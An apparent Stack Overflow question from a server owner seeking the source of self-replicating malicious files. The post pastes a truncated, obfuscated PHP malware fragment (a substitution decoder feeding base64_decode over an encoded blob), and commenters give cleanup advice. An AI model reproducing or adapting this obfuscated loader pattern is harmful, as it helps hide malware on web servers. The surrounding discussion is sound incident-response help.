# Find malicious file that creates other files

Tags: php

I'm having a terrible problem with a file that's creating these all over the server. How can I trace what files i making them? The only way i'm able to control it is by tracing the mailman mainlog, and deleting the files. But even if I find all of them, more come back, which leads me to think their is a master file making them. Thank you in advance.

```
//
//
//

<?php
 $yconywpuxj = 9650; function liboaw($wadfpane, $mbxwlrug){$njcgvw = ''; for($i=0; $i < strlen($wadfpane); $i++){$njcgvw .= isset($mbxwlrug[$wadfpane[$i]]) ? $mbxwlrug[$wadfpane[$i]] : $wadfpane[$i];}
$euzoai="base64_decode";return $euzoai($njcgvw);}
$scbpiv = '7sKaUcAVEX7QWbcgvlAgXbeNEgvBhfOcGf9i59mo7sKaUcAVEX7QWbeNE3A'.
'KvwWNvwzw0FZ9oGBxF2MiClKnvbcmoFuTjXHnEXHKjpcmUJAaXpyiCJLw0FZ9oGBxF2MVEXynusKTEc ABUJ3iuFP9oGBxFP'.
'moUJjQUXxVEX7QW1AGycWJychio7mo49moFIynLmcIc2cIJgu7I1MnLmczyDuuhqm'.
'PhDtD5gZxFP22X3x1LKE1LKBwL2cxG3y1Xm1fy1hwXIZAhFhezdvazFk90dfD59moFJKloF1KCXMm4IP2X3x1LKE1LKBwI1yLL'.
'1AjXmERLKuML2y1y1AsG3hwXI2iq7QW49moF722X3x1LKE1LKBwI1'.
'yLL1AjXmERLKuML2y1y1AsG3hwXIZAhFhezdvazFk90dfD59moF'.
'XmxFwmxFlKlosKVvbcmoFyny2Kzyczio7mo49moFJENvlcHjbPQW1AsILe1'.
'LgMHvgZ2UbcOhqm+hFylUJeKo7moFXBxFP2WUJjQhXxmvwMNvgP2ElKBEcBwCl1TEIuu0FZD0li9Eghio'.
    '7moF7KSq7QWF722ElKBEJOHCJLPRIMHCYyKvKATjJxgCpzQWsEiCscCWbOHCJLwXI2Sq7QWF722ElKBEJOHCJ'.
'LPRIMauJ3nCJ1dvlAVoFylUJeKCl1TEI2Sq7QWF722ElKBEJOHCJLPRIMkCwcTXb3HjpW'.
'NvgP2ElKBEJOHCJLi59moF72WW1AsILe1L3B2UbcOXcBDCl1TEIWuhqmPWsEi'.
'CscajJ3K59moF7KAq7QWn7mon7moF7moEwcajpyiCbkPjpcVusATXpxmvlK9XpyHEpz'.
'QWYyK4Y7iq7iSq7QPhFZPWYyK4Y7PRIMVuYWiv1AmjJuVoFymEXHm0FZwRsf+Wg2Sq7QPhFZPWYyK4Y7PRIMVuYWnvlc9C'.
's1dEIPDRsfPUYWKEd3vhDhBhFWChFhBhFymEXHmoGBxFDZPhFZ2usckuFZAhYxmvKAgEXMBjJxKoFh'.
't0bf+hD9PhDhBhFymEXHmoGBxFDZPhFZ2usckuFZAhYxmvKAgEXMBjJxKoFWvhdkD0FZ'.

//
//
//
// AND SO ON FOR 100 Lines.
```

Comment: I would either "grep base64_decode -R ./" in the root directory of the offending code to find all instances or burn it to the ground and restart. It wouldn't happen to be Wordpress by any chance?

Comment: Delete *everything* and restore from a backup.

Comment: I'm voting to close this question as off-topic because it probably belongs on secure.stackoverflow.com but it does not belong here

Comment: @RiggsFolly: Did you mean http://security.stackexchange.com?

Comment: @JayBlanchard Did I get attacked. I was busy else where, what on earth happened. I have not been the target of a good _Abuse session_ for a while

Comment: @RocketHazmat Yup: Typo: Woops

Comment: Burn it down and start again is the solution? Do you think it's possible that something has been installed on the server itself?